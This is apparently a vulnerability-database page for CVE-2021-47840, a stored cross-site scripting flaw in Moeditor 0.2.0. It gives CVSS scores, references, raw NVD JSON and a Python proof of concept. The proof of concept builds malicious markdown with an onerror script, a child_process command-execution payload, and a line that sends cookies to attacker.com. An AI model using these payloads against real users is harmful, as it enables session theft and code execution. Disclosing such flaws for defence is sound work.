CVE-2021-47840

Description

Moeditor 0.2.0 contains a persistent cross-site scripting vulnerability that allows attackers to store malicious payloads within markdown files. Attackers can upload specially crafted markdown files with embedded JavaScript that execute when opened, potentially enabling remote code execution on the victim's system.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Moeditor 0.2.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2021-47840 PoC - Moeditor Persistent XSS
# Create a malicious markdown file with embedded XSS payload

malicious_content = '''
# Test Document

![XSS](https://example.com/image.jpg" onerror="alert(document.domain))

This is a test document.
'''

# Save the malicious file
with open('malicious.md', 'w', encoding='utf-8') as f:
    f.write(malicious_content)

print('Malicious markdown file created: malicious.md')
print('When opened in Moeditor, the JavaScript will execute')

# Alternative payload for RCE (if nodeIntegration is enabled)
rce_payload = '''
# Document

<script>
require('child_process').exec('calc.exe');
</script>
'''

# HTML-based payload
html_payload = '''
# Document

<img src=x onerror="fetch('http://attacker.com/steal?cookie='+document.cookie)">
'''

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47840
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47840
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47840/
[4] VulDB https://vuldb.com/cve/CVE-2021-47840
[5] https://imgur.com/a/UdP4JaX
[6] https://moeditor.js.org/
[7] https://www.exploit-db.com/exploits/49830
[8] https://www.vulncheck.com/advisories/moeditor-persistent-cross-site-scripting
[9] https://www.vulncheck.com/advisories/moeditor-persistent-cross-site-scripting

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47840", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:09.700", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Moeditor 0.2.0 contains a persistent cross-site scripting vulnerability that allows attackers to store malicious payloads within markdown files. Attackers can upload specially crafted markdown files with embedded JavaScript that execute when opened, potentially enabling remote code execution on the victim's system."}, {"lang": "es", "value": "Moeditor 0.2.0 contiene una vulnerabilidad de cross-site scripting persistente que permite a los atacantes almacenar cargas útiles maliciosas dentro de archivos markdown. Los atacantes pueden subir archivos markdown especialmente diseñados con JavaScript incrustado que se ejecutan al abrirse, lo que podría permitir la ejecución remota de código en el sistema de la víctima."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://imgur.com/a/UdP4JaX", "source": "[email protected]"}, {"url": "https://moeditor.js.org/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49830", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/moeditor-persistent-cross-site-scripting", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/moeditor-persistent-cross-site-scripting", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}